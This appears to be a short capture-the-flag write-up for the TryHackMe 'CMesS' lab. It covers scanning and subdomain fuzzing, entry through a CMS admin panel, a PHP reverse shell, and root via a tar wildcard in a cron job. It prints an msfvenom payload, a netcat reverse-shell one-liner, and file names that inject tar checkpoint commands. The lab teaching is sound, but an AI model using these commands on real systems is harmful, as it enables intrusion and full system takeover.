Today we will take a look at TryHackMe: CMesS. Please try to understand each step and take notes.
Command: sudo nmap -sS -sC -sV -oN nmap/initial IP
Command: gobuster dir -u http://cmess.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Let’s look at the admin panel
I had no idea. Until I think of looking at the subdomain.
Command: ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm/ -H “Host: FUZZ.cmess.thm” -fw 522
Note: I used the “-fw” command to filter the same ones.
When we look at the page, we find important information that we need to access the admin panel.
Boom. We are already on the panel. Let’s get the reverse shell.
Administration> Themes> Gila Blog (folder icon)> And a few steps back.
I put index.php myself to make it easier.
Let’s look at the home directory first.
Excellent. We need permission. It’s time to launch linpeas.sh. Let’s go to the / tmp folder
For some reason, when I saw the file with the extension .tar.gz, I checked the crontab.
Excellent. But we have a problem. We don’t know Andre’s password.
Let’s start Linpeas.
Command: chmod +x linpeas.sh
Look at the results.
We found the password. Let’s go to the backup file
Day 67: Tar Cron 2 Root — Abusing Wildcards for Tar Argument Injection in root cronjob (Nix)
I researched from various sources. But I used this source.
Let’s get the reverse shell.
Create the payload first.
Command: msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=4444 R
Let’s go to the backup file, create the script and listen.
Command: echo “mkfifo /tmp/prrcdw; nc IP Port 0</tmp/prrcdw | /bin/sh >/tmp/prrcdw 2>&1; rm /tmp/prrcdw” > shell.sh
Command: echo “” > “ — checkpoint-action=exec=sh shell.sh”
Command: echo “” > — checkpoint=1
Command: nc -nvlp 4444
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”